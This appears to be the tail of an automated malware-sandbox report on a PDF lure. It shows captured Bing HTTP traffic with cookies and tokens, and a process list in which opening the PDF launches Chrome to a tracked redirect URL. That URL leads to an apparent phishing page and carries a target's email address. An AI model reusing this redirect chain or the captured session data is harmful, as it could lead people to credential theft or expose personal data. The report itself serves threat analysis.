                                                                                                        X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXFbfVe69dIZwHZLfOs%2BLxlMjYOWBawJ46X0VeEjzEp19o0BWzNWuo8i2psU40/5QmPKmWqzyVi/RmKvvIJiejyQDJFlgL9gQh72QLL%2BGp8SFz8TuM2y3QdJ5hEpqER1uN3h7790PAp513hxNXU7anDjWONUApXZfkrAPkYVi1T7sgLCmAA6yP8ZBeWXdgF7sWHxDEJubHTApa/k3bztoTrPfy631oa70zBsO9elyv3R9fU8Oj9GjwHA2%2BPiML5qSZlnGgQbrXMJLjO80IndpuUGQquMzd29X9geHCDszAGw5r3QaNoYYg7WvPKHo5TeVSXcry07Ovzk07Rl5epm1zgQZgAAEIPgQoUR904eLer6TsLq8DewARtA0Mbn2iJZz4oaGZ0r6q00D53DbJlArj4m2kd4H7IrQStqgCC4GxgHpE2Ko/nL0GR0h9PxupHAHXg8qOM3VICyjAn9yFaQPyN8%2B/TCA4AcWZcQyiZcl4l0JFQ4ACgi5oZ9AdTOxcjw%2BzbhJKhfRj%2BhwpZg9RviwWXiHfzwShdA0nWRdpjJ8Q99YqyTHmoTRxnvV73nT9K9YOlrglYBiUIuFdg0aCVfjxohOY%2Bdcc%2B6WcoBQOKzvVLpRH2Sea0ASKHLJ%2Br/F370430k/gyDl/rKa12lYz0S1vZyNYgSWYgPgO6NTw5mfgjGr9gu9BnfKjacbgtske7T7FlPHX2Rj4vYqVZoljszJxnki7dVDtYzYZK3nD9/4QoHjtRm0XQh5%2B3I%2BWVW06rSYG1Z9t9UZ7EacEz/2JD98wx/9%2BaJBCu5dc2iMdUHjo1oDrdz2fa3mkIRXsX75Nh4Kv/J%2BZ3iPE9/%2BI8pqNuEdLhJ3CXRDCYd5Cq%2BlO%2BzvciED8IsKswfuLFQZC0nSdaaAgnuGyBQW2sG6Qde29ngkFUc4NKVGF2AG [TRUNCATED]
                                                                                                        X-Agent-DeviceId: 01000A4109009A83
                                                                                                        X-BM-CBT: 1728047520
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                        X-Device-isOptin: false
                                                                                                        Accept-language: en-GB, en, en-US
                                                                                                        X-Device-Touch: false
                                                                                                        X-Device-ClientSession: 578B137560FC45709C3F28278275A5C7
                                                                                                        X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                        Host: www.bing.com
                                                                                                        Connection: Keep-Alive
                                                                                                        Cookie: SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUID=5047E5942BB2460EA35B53CCF78DDB3D; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                        2024-10-04 13:12:03 UTC1320INHTTP/1.1 200 OK
                                                                                                        Content-Length: 2215
                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                        Cache-Control: private
                                                                                                        X-EventID: 66ffe9a34ba2496993e6d66da08810e7
                                                                                                        X-AS-SetSessionMarket: de-ch
                                                                                                        UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                        X-XSS-Protection: 0
                                                                                                        P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                        Date: Fri, 04 Oct 2024 13:12:03 GMT
                                                                                                        Connection: close
                                                                                                        Set-Cookie: _EDGE_S=SID=1D4F8CB6A61D69943CE299B8A7E868C2&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                        Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; domain=.bing.com; expires=Wed, 29-Oct-2025 13:12:03 GMT; path=/; secure; SameSite=None
                                                                                                        Set-Cookie: ANON=A=6167974D1A7C78361D9CC53BFFFFFFFF; domain=.bing.com; expires=Wed, 29-Oct-2025 13:12:03 GMT; path=/; secure; SameSite=None
                                                                                                        Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                        Set-Cookie: _SS=SID=1D4F8CB6A61D69943CE299B8A7E868C2; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                        Alt-Svc: h3=":443"; ma=93600
                                                                                                        X-CDN-TraceID: 0.15d01702.1728047523.23f48641
                                                                                                        2024-10-04 13:12:03 UTC2215INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                                        Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:09:11:08
                                                                                                        Start date:04/10/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Hollandco-File-871871493.pdf"
                                                                                                        Imagebase:0x7ff68afa0000
                                                                                                        File size:5'641'176 bytes
                                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:2
                                                                                                        Start time:09:11:10
                                                                                                        Start date:04/10/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                        Imagebase:0x7ff6f24c0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:3
                                                                                                        Start time:09:11:11
                                                                                                        Start date:04/10/2024
                                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1364,i,8592618082487907897,1787593740765580541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                        Imagebase:0x7ff6f24c0000
                                                                                                        File size:3'581'912 bytes
                                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:5
                                                                                                        Start time:09:11:14
                                                                                                        Start date:04/10/2024
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dtnyxe.member365.com/ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibot#dwensel+hollandco.com
                                                                                                        Imagebase:0x7ff7f9810000
                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:6
                                                                                                        Start time:09:11:14
                                                                                                        Start date:04/10/2024
                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1964,i,1274758649154264039,11806358632527105153,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                        Imagebase:0x7ff7f9810000
                                                                                                        File size:3'242'272 bytes
                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        No disassembly